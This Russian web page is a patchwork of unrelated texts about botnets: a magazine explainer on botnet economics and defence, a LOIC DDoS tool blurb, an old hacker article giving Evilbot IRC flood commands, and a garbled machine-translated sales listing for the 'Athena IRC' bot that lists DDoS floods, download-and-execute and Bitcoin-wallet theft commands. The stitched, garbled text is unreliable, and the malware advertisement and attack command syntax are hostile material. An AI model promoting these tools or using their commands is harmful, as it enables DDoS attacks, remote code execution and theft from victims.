Боевые DDoS боты в IRC. Ботнет

Сегодня ботнеты стали одним из главных инструментов киберпреступников. ComputerBild расскажет, что такое ботнеты, как они работают и как спасти свой компьютер от попадания в зомби-сеть.

Ботнет, или зомби-сеть, - это сеть компьютеров, зараженных вредоносной программой, позволяющей злоумышленникам удаленно управлять чужими машинами без ведома их владельцев. В последние годы зомби-сети стали стабильным источником дохода для киберпреступников. Неизменно низкие издержки и минимум знаний, необходимых для управления ботнетами, способствуют росту популярности, а значит, и количества ботнетов. На DDoS-атаках или спам-рассылках, осуществляемых с помощью зомби-сетей, злоумышленники и их заказчики зарабатывают тысячи долларов.

Заражен ли мой компьютер ботом?

Ответить на этот вопрос непросто. Дело в том, что отследить вмешательство ботов в повседневную работу ПК практически невозможно, поскольку оно никак не отражается на быстродействии системы. Тем не менее существует несколько признаков, по которым можно определить, что в системе присутствует бот:

Неизвестные программы пытаются осуществить соединение с Интернетом, о чем периодически возмущенно докладывает брандмауэр или антивирусное ПО;

Интернет-трафик становится очень велик, хотя вы пользуетесь Сетью весьма умеренно;

В списке запущенных системных процессов появляются новые, маскирующиеся под обычные процессы Windows (к примеру, бот может носить имя scvhost.exe - это название очень похоже на название системного процесса Windows svchost.exe; заметить разницу довольно сложно, но - можно).

Зачем создаются ботнеты

Ботнеты создаются, чтобы зарабатывать деньги. Можно выделить несколько сфер коммерчески выгодного применения зомби-сетей: DDoS-атаки, сбор конфиденциальной информации, рассылка спама, фишинг, поисковый спам, накрутка клик-счетчиков и пр. Надо заметить, что прибыльным будет любое направление, какое бы злоумышленник ни выбрал, причем ботнет позволяет осуществлять все перечисленные виды деятельности одновременно.

DDoS-атака (от англ. Distributed Denial-of-Service) - это атака на компьютерную систему, например на веб-сайт, целью которой является доведение системы до «падения», то есть состояния, когда она больше не сможет принимать и обрабатывать запросы легитимных пользователей. Один из самых распространенных методов проведения DDoS-атаки - отправка многочисленных запросов на компьютер или сайт-жертву, что и приводит к отказу в обслуживании, если ресурсы атакуемого компьютера недостаточны для обработки всех поступающих запросов. DDoS-атаки являются грозным оружием хакеров, а ботнет - идеальным инструментом для их проведения.

DDoS-атаки могут быть как средством недобросовестной конкурентной борьбы, так и актами кибертерроризма. Хозяин ботнета может оказать услугу любому не слишком щепетильному предпринимателю - провести DDoS-атаку на сайт его конкурента. Атакуемый ресурс после такой нагрузки «ляжет», заказчик атаки получит временное преимущество, а киберпреступник - скромное (или не очень) вознаграждение.

Таким же образом сами владельцы ботнетов могут использовать DDoS-атаки для вымогания денег у крупных компаний. При этом компании предпочитают выполнять требования киберпреступников, поскольку ликвидация последствий удачных DDoS-атак стоит весьма дорого. Например, в январе 2009 года один из крупнейших хостеров GoDaddy.com подвергся DDoS-атаке, в результате которой тысячи сайтов, размещенных на его серверах, оказались недоступными почти на сутки. Финансовые потери хостера были огромны.

В феврале 2007 года был проведен ряд атак на корневые DNS-серверы, от работы которых напрямую зависит нормальное функционирование всего Интернета. Маловероятно, что целью этих атак было обрушение Всемирной сети, ведь существование зомби-сетей возможно только при условии, что существует и нормально функционирует Интернет. Больше всего это было похоже на демонстрацию силы и возможностей зомби-сетей.

Реклама услуг по осуществлению DDoS-атак открыто размещена на многих форумах соответствующей тематики. Цены на атаки колеблются от 50 до нескольких тысяч долларов за сутки непрерывной работы DDoS-ботнета. По данным сайта www.shadowserver.org, за 2008 год было проведено порядка 190 тысяч DDoS-атак, на которых киберпреступники смогли заработать около 20 миллионов долларов. Естественно, в эту сумму не включены доходы от шантажа, которые просто невозможно подсчитать.

Сбор конфиденциальной информации

Конфиденциальная информация, которая хранится на компьютерах пользователей, всегда будет привлекать злоумышленников. Наибольший интерес представляют номера кредитных карт, финансовая информация и пароли к различным службам: почтовым ящикам, FTP-серверам, «мессенджерам» и др. При этом современные вредоносные программы позволяют злоумышленникам выбирать именно те данные, которые им интересны, - для этого достаточно загрузить на ПК соответствующий модуль.

Злоумышленники могут либо продать украденную информацию, либо использовать ее в своих интересах. На многочисленных форумах в Сети каждый день появляются сотни объявлений о продаже банковских учетных записей. Стоимость учетной записи зависит от количества денег на счету пользователя и составляет от 1 до 1500 долларов за счет. Нижняя граница свидетельствует о том, что в ходе конкурентной борьбы киберпреступники, занимающиеся такого рода бизнесом, вынуждены снижать цены. Чтобы заработать действительно много, им необходим стабильный приток свежих данных, а для этого обязателен стабильный рост зомби-сетей. Особенно интересна финансовая информация кардерам - злоумышленникам, занимающимся подделкой банковских карт.

О том, насколько выгодны такие операции, можно судить по известной истории с группой бразильских киберпреступников, которые были арестованы два года назад. Они смогли снять с банковских счетов простых пользователей 4,74 миллиона долларов, используя украденную с компьютеров информацию. В приобретении персональных данных, не имеющих прямого отношения к деньгам пользователя, заинтересованы и преступники, которые занимаются подделкой документов, открытием фальшивых банковских счетов, совершением незаконных сделок и т.д.

Еще одним видом собираемой ботнетами информации являются адреса электронной почты, причем, в отличие от номеров кредиток и учетных записей, из адресной книги одного зараженного ПК можно извлечь множество электронных адресов. Собранные адреса выставляются на продажу, причем иногда «на развес» - помегабайтно. Основными покупателями подобного «товара» являются спамеры. Список из миллиона e-mail-адресов стоит от 20 до 100 долларов, а заказанная спамерам рассылка на этот же миллион адресов - 150-200 долларов. Выгода очевидна.

Преступникам также интересны учетные записи различных платных сервисов и интернет-магазинов. Безусловно, они обходятся дешевле банковских учетных записей, но их реализация связана с меньшим риском преследования со стороны правоохранительных органов.

Ежедневно по всему миру курсируют миллионы спам-сообщений. Рассылка незапрошенной почты является одной из основных функций современных ботнетов. По данным «Лаборатории Касперского», около 80% всего спама рассылается через зомби-сети. С компьютеров законопослушных пользователей отправляются миллиарды писем с рекламой «Виагры», копий дорогих часов, онлайн-казино и т. п., забивающих каналы связи и почтовые ящики. Таким образом хакеры ставят под удар компьютеры ни в чем не повинных пользователей: адреса, с которых ведется рассылка, попадают в черные списки антивирусных компаний.

В последние годы сама сфера спам-услуг расширилась: появился ICQ-спам, спам в социальных сетях, форумах, блогах. И это тоже «заслуга» владельцев ботнетов: ведь совсем несложно дописать к бот-клиенту дополнительный модуль, открывающий горизонты для нового бизнеса со слоганами типа «Спам в Facebook. Недорого». Цены на спам варьируются в зависимости от целевой аудитории и количества адресов, на которые ведется рассылка. Разброс цен на целевые рассылки - от 70 долларов за сотни тысяч адресов до 1000 долларов за несколько десятков миллионов адресов. За прошедший год спамеры заработали на рассылке писем порядка 780 миллионов долларов.

Создание поискового спама

Еще один вариант использования ботнетов - повышение популярности сайтов в поисковых системах. Работая над поисковой оптимизацией, администраторы ресурсов стараются повысить позицию сайта в результатах поиска, поскольку чем она выше, тем больше посетителей зайдет на сайт через поисковые системы и, следовательно, тем больше будет выручка владельца сайта, например от продажи рекламных площадей на веб-страницах. Многие компании платят веб-мастерам немалые деньги, чтобы они вывели сайт на первые позиции в «поисковиках». Владельцы ботнетов подсмотрели некоторые их приемы и автоматизировали процесс поисковой оптимизации.

Когда вы видите в комментариях к своей записи в «Живом Журнале» или удачной фотографии, выложенной на фотохостинге, множество ссылок, созданных неизвестным вам человеком, а иногда и вашим «френдом», - не удивляйтесь: просто кто-то заказал раскрутку своего ресурса хозяевам ботнета. Специально созданная программа загружается на зомби-компьютер и от имени его владельца оставляет на популярных ресурсах комментарии со ссылками на раскручиваемый сайт. Средняя цена на нелегальные услуги поискового спама - порядка 300 долларов в месяц.

Сколько стоят персональные данные

Стоимость украденных персональных данных напрямую зависит от страны, в которой живет их законный владелец. Например, полные данные жителя США стоят 5-8 долларов. На черном рынке особенно ценятся данные жителей Евросоюза - они в два-три раза дороже данных граждан США и Канады. Это можно объяснить тем, что такими данными преступники могут пользоваться в любой стране, входящей в ЕС. В среднем по миру цена полного пакета данных об одном человеке составляет порядка $7.

К сожалению, тому, кто решил «с нуля» организовать ботнет, не составит особого труда найти в Интернете инструкцию по созданию зомби-сети. Первый шаг: создать новую зомби-сеть. Для этого нужно заразить компьютеры пользователей специальной программой - ботом. Для заражения используются спам-рассылки, постинг сообщений на форумах и в социальных сетях и другие приемы; часто бот наделяется функцией самораспространения, как вирусы или черви.

Чтобы заставить потенциальную жертву установить бот, используют приемы социальной инженерии. Например, предлагают посмотреть интересное видео, для чего требуется скачать специальный кодек. После загрузки и запуска такого файла пользователь, конечно, не сможет посмотреть никакого видео и скорее всего не заметит вообще никаких изменений, а его ПК окажется заражен и станет покорным слугой, выполняющим все команды хозяина ботнета.

Вторым широко используемым методом заражения ботами является drive-by-загрузка. При посещении пользователем зараженной веб-страницы на его компьютер через различные «дыры» в приложениях - прежде всего в популярных браузерах - загружается вредоносный код. Для эксплуатации слабых мест используются специальные программы - эксплойты. Они позволяют не только незаметно загрузить, но и незаметно запустить вирус или бот. Такой вид распространения вредоносного ПО наиболее опасен, ведь, если взломан популярный ресурс, заразятся десятки тысяч пользователей!

Бот можно наделить функцией самораспространения по компьютерным сетям. Например, он может распространяться путем заражения всех доступных исполняемых файлов или путем поиска и заражения уязвимых компьютеров сети.

Зараженные компьютеры ничего не подозревающих пользователей создатель ботнета может контролировать с помощью командного центра ботнета, связываясь с ботами через IRC-канал, веб-соединение или с помощью любых других доступных средств. Достаточно объединить в сеть несколько десятков машин, чтобы ботнет начал приносить своему хозяину доход. Причем этот доход находится в линейной зависимости от устойчивости зомби-сети и темпов ее роста.

Рекламные компании, работающие онлайн по схеме PPC (Pay-per-Click), платят деньги за уникальные клики по ссылкам на размещенных в Интернете объявлениях. Для владельцев ботнета обман таких компаний является прибыльным занятием. Для примера можно взять известную сеть Google AdSense. Входящие в нее рекламодатели платят Google за клики по размещенным объявлениям в надежде, что заглянувший «на огонек» пользователь что-нибудь у них купит.

Google в свою очередь размещает контекстную рекламу на различных сайтах, участвующих в программе AdSense, платя владельцу сайта процент с каждого клика. Увы, не все владельцы сайтов честные. Имея зомби-сеть, хакер может генерировать тысячи уникальных кликов в день - по одному с каждой машины, чтобы не вызывать особых подозрений у Google. Таким образом, деньги, потраченные на рекламную компанию, перетекут в карман к хакеру. К сожалению, не было еще ни одного случая, когда за подобные акции кого-либо привлекали к ответственности. По данным компании Click Forensics, в 2008 году порядка 16-17% всех переходов по рекламным ссылкам были поддельными, из них минимум треть генерировалась ботнетами. Выполнив несложные вычисления, можно понять, что в прошлом году владельцы ботнетов «накликали» 33 000 000 долларов. Неплохой доход от щелчков мышью!

Злоумышленникам и нечистым на руку бизнесменам совсем не обязательно своими силами создавать ботнет «с нуля». Ботнеты самых разных размеров и производительности они могут купить или арендовать у хакеров - например, обратившись на специализированные форумы.

Стоимость готового ботнета, равно как и стоимость его аренды, напрямую зависит от количества входящих в него компьютеров. Наибольшей популярностью готовые ботнеты пользуются на англоязычных форумах.

Маленькие ботнеты, состоящие из нескольких сотен ботов, стоят от 200 до 700 долларов. При этом средняя цена одного бота составляет примерно 50 центов. Более крупные ботнеты стоят больших денег.

Зомби-сеть Shadow, которая была создана несколько лет назад 19-летним хакером из Голландии, насчитывала более 100 тысяч компьютеров, расположенных по всему миру, продавалась за 25 000 евро. За эти деньги можно купить небольшой домик в Испании, однако преступник из Бразилии предпочел приобрести ботнет.

Средства защиты от ботнетов

1. В первую очередь это анитивирусные программы и комплексные пакеты для защиты от интернет-угроз с регулярно обновляемыми базами. Они помогут не только вовремя обнаружить опасность, но и ликвидировать ее до того, как ваш превращенный в зомби верный «железный друг» начнет рассылать спам или «ронять» сайты. Комплексные пакеты, например Kaspersky Internet Security 2009, содержат полный комплект защитных функций, управлять которыми можно через общий командный центр.

Антивирусный модуль в фоновом режиме выполняет сканирование важнейших системных областей и контролирует все возможные пути вторжения вирусов: вложения электронной почты и потенциально опасные веб-сайты.

Брандмауэр следит за обменом данными между персональным компьютером и Интернетом. Он проверяет все пакеты данных, получаемые из Сети или отправляемые туда, и при необходимости блокирует сетевые атаки и препятствует тайной отправке личных данных в Интернет.

Спам-фильтр защищает почтовый ящик от проникновения рекламных сообщений. В его задачи также входит выявление фишинговых писем, с помощью которых злоумышленники пытаются выудить у пользователя информацию о его данных для входа в онлайновые платежные или банковские системы.

2. Регулярное обновление операционной системы, веб-браузеров и других приложений, разработчики которых обнаруживают и ликвидируют многие бреши в их защите, а также слабые места, используемые злоумышленниками.

3. Специальные программы-шифровальщики защитят ваши персональные данные, даже если бот уже проник на компьютер, ведь для доступа к ним ему придется взломать пароль.

4. Здравый смысл и осторожность. Если вы хотите оградить свои данные от разного рода угроз, не стоит скачивать и устанавливать программы неизвестного происхождения, открывать архивы с файлами вопреки предупреждениям антивируса, заходить на сайты, которые браузер помечает как опасные, и т.д.

Благодарим «Лабораторию Касперского» за помощь в подготовке материала

LOIC - это программа, которая обеспечивает активацию DDoS-атаки на сайт или сервер. Этот инструмент изначально создан для проверки защиты, которая находится на нём. Программа предназначена для запуска DDOS-атак и работает как специальный инструмент, поэтому используйте его только для проведения экспериментов.

В программе есть доступ к исходному коду. При необходимости закачайте дополнительные материалы с сервиса SourceForge. В источнике программа обозначена вредоносной программой. Загружая Low Orbit Ion Cannon, помните, что вы используете её на свой страх и риск.

Принцип работы

Программа внедряется в сервер и совершает многоуровневую атаку, открывая множество подключений к серверу. После этого «LOIC» нарушает работу сервера и добивается кода ошибки, который означает «победу». Нарушение работы сервера происходит в последовательном режиме. В окне программы вы просматриваете подробную статистику о доступных ошибках на сервере и его работоспособность.

«Взламывая сервер» DDoS – атаками, вы видите данные об активных подключениях. Эти параметры изменяются постоянно в процессе атаки. Кроме того, вы видите сообщения о коде, который возвращается с сервера и пытается подключиться к нему в стандартном режиме.

Утилита работает в стандартном режиме, используя обычные инструменты и методы взлома. LOIC «забрасывает» спам в HTTP-запросы и добивается поломки устройства. LOIC распространяется в стандартной версии, а также в атакующей через новостные ленты и программы для общения. Второй вариант программы подойдёт создателям ботнетов.

Интерфейс

Все функции, которые находятся в программе LOIC, расположены на одной панели. Указав адрес сервера или айпи адрес для атаки, вы увидите список доступных подключений. Графический интерфейс простой и интуитивный, но в оболочке отсутствует русская локализация. Зачастую, такие инструменты не переводят на русский язык.

Ключевые особенности

  • инструмент «взламывает» сервер, совершая атаку, и добивается отказа оборудования на нём;
  • в программе простой интерфейс, который создан в однооконном режиме;
  • LOIC отсылает спам в виде запросов через протокол HTTP, и другие пакеты;
  • в интерфейсе есть исходный код с открытым доступом, который создан на языке программирования C#;
  • «взломщик» работает на сборках OS Windows старого поколения;
  • программа работает на бесплатной лицензии.

IRC боты становятся орудием DDOS - атак. Юних-машины уже не
требуются для проведения DOS-атак (вероятно, у вас есть проги типа TFN, Trin00 которые работают на *nix-ах), все уже стало гораздо проще.

Теперь на любой Windows машине можно повесить своего бота, который легок в настройке и управлении. Атаки же контролируются с канала, на который джойнятся боты. Придя на канал, бот просто "сидит и ждет" команд хозяина. Обычно такие
каналы либо секретные или запароленные, поэтому зайти на канал и контролировать действия бота может только его владелец.

Но у подобного метода DDOS - атак есть один огромный минус: жертва может вычислить сервер, канал и пароль к нему. Это может привести к тому, что он просто "выкрадет" вашу армию ботов. Но этого можно избежать, скомандовав ботам коннектиться на разные серверы, поэтому проследить всех ботов на всех серверах будет очень геморройно (представьте допустим,что десяток ботов коннектится на первый канал, десяток на второй и так далее - вычислить ВСЕ боты в такой ситуации довольно трудно).

Как боты атакуют жертву?

Разница между DOS и DDOS атаками огромна: в то время когда DOS - атака проводится с помощью известной дыры в системе, то DDOS - атака флудит машину с разных хостов бессмысленными пакетами, чем замедляет способность системы получать и обрабатывать данные, а от этого
защититься чрезвычайно трудно. DDOS IRC боты, сидящие на Вин9х, посылают UDP и ICMP
пакеты (то бишь пингуют), насколько позволяет максимальная исходящая пропускная способность хоста.

Существуют боты, которые могут генерировать гораздо более опасные пакеты, которые нарушают TCP - синхронизацию соединения (TCP Syn/Ack), но подобные атаки не могут осуществляться с хостов, на которых стоит Вин9х. Обычно такие боты ставятся на Вин2К/ХР -
только там есть все необходимые средства. Они могут делать атаку на веб-сервер очень каверзной и трудно блокируемой: UDP и ICMP еще как-то могут фильтроваться провайдером и не могут влиять на качество работы сервисов, но TCP пакеты нельзя отключить, не повлияв на трафик. Обычно, когда отключаются TCP, это означает, что сервер не может нормально предоставлять web и ftp услуги.

Существуют уже готовые боты, написанные специально для использования в среде Win2k и WinXP (например Evilbot или Slackbot 1.0). Именно с помощью Evilbot" а был завален grc.com. Сам бот представляет собой маленький файл (размером 10-16 кб), который запускает жертва на своей машине, после чего бот прописывает себя в директорию Windows (например так: \Windows\WinRun2.exe). Для запуска каждый раз бот прописывает себя и в разделе автостарта в реестре:
HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\Run\ и выглядит примерно следующим образом:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run\WinRun. Evilbot никогда не будет переписывать свои файлы, а только перепрописывает себя в реестре, где указывает путь к своей директории.

Потом бот пытается законнектиться на конкретный IRC - сервер, заходит туда и тихо сидит на канале в ожидании команд. Параллельно он
коннектится на другой сервер, откуда качает трояна, запускает его примерно таким образом: "update.ur.address./thepath.exe". Если бот первым зашел на незарегистрированный канал, то он тут же по умолчанию ставит мод + nstk. Evilbot слушается любого присутствующего на канале человека (а Slackbot 1.0 просит пароль). Ему можно скомандовать пинг определенного хоста: "!udp 101.105.201.212 1000 0", где 1000 - количество пакетов, а 0 в конце - задержка времени между пакетами.
Пинг Evilbot" а представляет собой следующее:

P4
Sends 10000 64 kbyte ping пакетов на определенный ip
!p3 < ip жертвы >
Sends 1000 64 kbyte ping пакетов на определенный ip
!p2 < ip жертвы >
Sends 100 64 kbyte ping пакетов на определенный ip
!p1 < ip жертвы >
Sends 10 64 kbyte ping пакетов на определенный ip

Количество пингов и их размер можно варьировать - например, команда!p4 посылает 15000 32-байтных ICMP пакетов на указанный ip.

Как узнать, сидит ли у меня в системе бот?

Некоторые антивирусы не видят ботов в системе, но обнаружить их можно ручками, проверив комп на наличие несанкционированного IRC - коннекта. Можно просто проверить все свои сетевые соединения: netstat -an | find ":6667"

Если она подтвердит вам активное соединение, то вполне может быть, что ваша машина заражена. Не помешает проверить и другие порты, которые часто использует IRC.
Можно заглянуть в реестр и проверить его на наличие новых подозрительных изменений тут:
HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\Run. Если найдете ключ, указывающий на присутствие бота, то удалите его, ребутните комп и удалите гадкого бота.

Athena IRC является стабильной DDoS бот кодируется в C ++ (ноль зависимостей) идеально подходит для заражения и пасет машины Windows. Этот бот показывает некоторые из самых лучших, самых передовых тактики DDoS доступных на рынке, который снесут вебсервер, игровые серверы, TeamSpeak / VoIP-серверы, домашние соединения и т.д. с легкостью. Он устойчив к botkilling, и будут убивать большинство других ботов доступны.
Робот оснащен:
- Botkiller способен уничтожить ботов, таких как Андромеда, Зевс, SpyEye, бессоннице, SmokeLoader, ngrBot и т.д
- 11 методы DDoS, те же тактики, используемые в AthenaIRC (одни из самых сильных тактики DDoS доступных на рынке)
- Встроенный веб-сайт проверки, который использует ботов, а не в отличие от hyperspin.com или just-ping.com
- SmartView / нормальный вид / вид скрытой (от случайного существующего Брауэр)
- Углубленное статистические данные о каждом бота
- Загрузка / Обновление / Удаление
- Команды Shell (потому что вы никогда не знаете)
Пожалуйста, обратите внимание: Бункер не FUD.

Команды / Особенности: (Вы можете установить любой из них в вашей теме - боты будут анализировать команду на соединение)
Команды DDoS
[Порт 80 является наиболее распространенным для сайтов]
! УДП - Посылает массовые количества случайных пакетов целевого хоста / IP, идеально подходит для домашних подключений (СИНТАКСИС: UDP хост / IP порт время!) [Использование "0", чтобы затопить случайные порты]
! Condis - Быстрое подключение / отключение от наводнений, он принимает вниз игры (т. Е CSS) и TeamSpeak / VoIP-серверы, как подливкой (! СИНТАКСИС: condis хост / IP порт времени)
! HttpGet - Быстро отправляет сотни HTTP GET запросов каждую секунду от каждого бота
! HttpPost - Делает сотни запросов HTTP POST от каждого бота, и держит соединение, медленно размещения контента
Зарегистриротвать Хостигн ←
Команды Наводнение IRC War
! ИРЦ - Подключение к IRC, и наводнения цели (#channel или пользователя), используя множество различных методов общения в IRC. (Синтаксисом: ИРЦ irc.server.net 6667 180 ник / # канал)
! Anope - Layer 7 IRC DDoS. Это не имеет значения, если скрытый Концентратор сети IRC является защита услуги, они по-прежнему могут быть ddos"ed на уровне приложений. Эта атака приведет к краху Anope услуг. (Синтаксисом: Anope irc.server.net 6667 180)
Разный Команды Bot
! ID - Показывает версию бота и кто имеет лицензию на
! Пинг - Возвращает время пинг-бота к его текущего соединения
! OpenURL - открывает веб-страницу в браузере по умолчанию (синтаксисом: OpenURL http://website.com !)
! Openurlhidden - открывает веб-страницу, скрытый в Internet Explorer (СИНТАКСИС: openurlhidden http://website.com !)
! Blockurl - Создает строка в файле компьютерных хостов, что запрещает доступ к указанному узлу (СИНТАКСИС: blockurl website.com)
! dlexec - Загрузка и выполняет файл с URL (СИНТАКСИС: dlexec http://website.com/program.exe !)
! - Обновление Загрузка и выполняет данную ссылку. Бот будет удалить после успешного выполнения (синтаксисом: updatehttp: //website.com/file.exe)
! Удалить - Удаляет бота и удаляет любые следы себе
Stealers
! Btcwallet - сканы бот компьютер для wallet.dat (BTC) кошелек и загружает его на FTP по вашему выбору (! СИНТАКСИС: btcwallet ftphost.com user123 pass123)
Команды IRC
! Сырец - Посылает сырые команды на сервер (СИНТАКСИС: сырые PRIVMSG #channel: сообщение!)
! Молчание вкл / выкл - Переключает выход бота (! Переопределены необработанного командой)
! Присоединиться - присоединяется бот к каналу (СИНТАКСИС: присоединиться к #channel !)
! - Детали бота из канала (! СИНТАКСИС: часть #channel)
! Newnick - Изменения бот ник, используя новое случайное число и имя
! Randnick вкл / выкл - Переключение для случайных имен бот (Samantha58385) и информация на основе названия бота ( ABCDE)
! Reconnect - Попытки подключиться к текущей IRC сервера / сети и канала после отключения в течение 20 секунд

Ботнет или сеть ботов - это компьютерная сеть, состоящая из большого количества компьютеров, на которых скрытно установлено вредоносное ПО, позволяющее злоумышленникам удаленно выполнять любые действия с использованием вычислительных ресурсов зараженных машин. Сотни или даже тысячи зараженных компьютеров, как правило, используются для нелегальной и вредоносной деятельности - рассылки спама, вирусов, похищения личных данных или проведения DDoS-атак. На сегодняшний день ботнеты считаются одной из самых серьезных киберугроз.

Как появляются ботнеты?

Для того, чтобы ваш компьютер стал частью ботнета, он должен быть инфицирован специализированным вредоносным ПО, которое поддерживает контакт с удаленным сервером или с иным зараженным устройством, получая, таким образом, инструкции к действиям от злоумышленников, контролирующих данный ботнет. Кроме внушительных масштабов заражения, вредоносное ПО, используемое в целях создания ботнетов, по существу мало чем отличается от традиционных вредоносных программ.

Как распознать ботнет?

Обнаружить типичное для ботнета вредоносное ПО можно тем же самым способом, что и в случае со всеми иными вредоносными программами. Косвенными признаками могут быть медленная работа, странные действия, сообщения об ошибках или внезапный запуск вентилятора охлаждения во время того, как компьютер находится в режиме ожидания. Это возможные симптомы того, что кто-то удаленно использует ваш компьютер, ставший частью разветвленного ботнета.

Как удалить ПК из ботнета?

Доя того, чтобы удалить свой ПК из ботнета, необходимо удалить вредоносное ПО, с помощью которого злоумышленники осуществляют удаленный контроль за ним. Самым эффективным способом является антивирусное сканирование системы вашего компьютера, которое поможет обнаружить вредоносную программу и отстранить ее с компьютера.

Как избежать заражения вредоносным ПО, характерным для ботнета:
  • Установите качественное антивирусное решение на свой компьютер
  • Настройте автоматическое обновление всех сторонних программ
  • Будьте предельно осторожны при переходе по ссылкам, загрузке программ и открытии файлов
Иные способы защиты от риска стать частью ботнета:

Чтобы обезопасить свой компьютер от риска стать одним из ‘зомби’ в армии ботнета, старайтесь избегать любых подозрительных загрузок. Не переходите по ссылкам и не открывайте вложенных файлов из писем, отправители которых вам неизвестны, и будьте предельно внимательны при установке стороннего ПО на свой компьютер. Поддерживайте стороннее ПО обновленным и устанавливайте все самые свежие обновления операционной системы. Однако самое важное - это использование современной и качественной антивирусной защиты, например, антивируса Avast, который обеспечит надежную защиту компьютера от всех типов вредоносного ПО и поможет избежать инфицирования вашего компьютера и включения его в ботнет.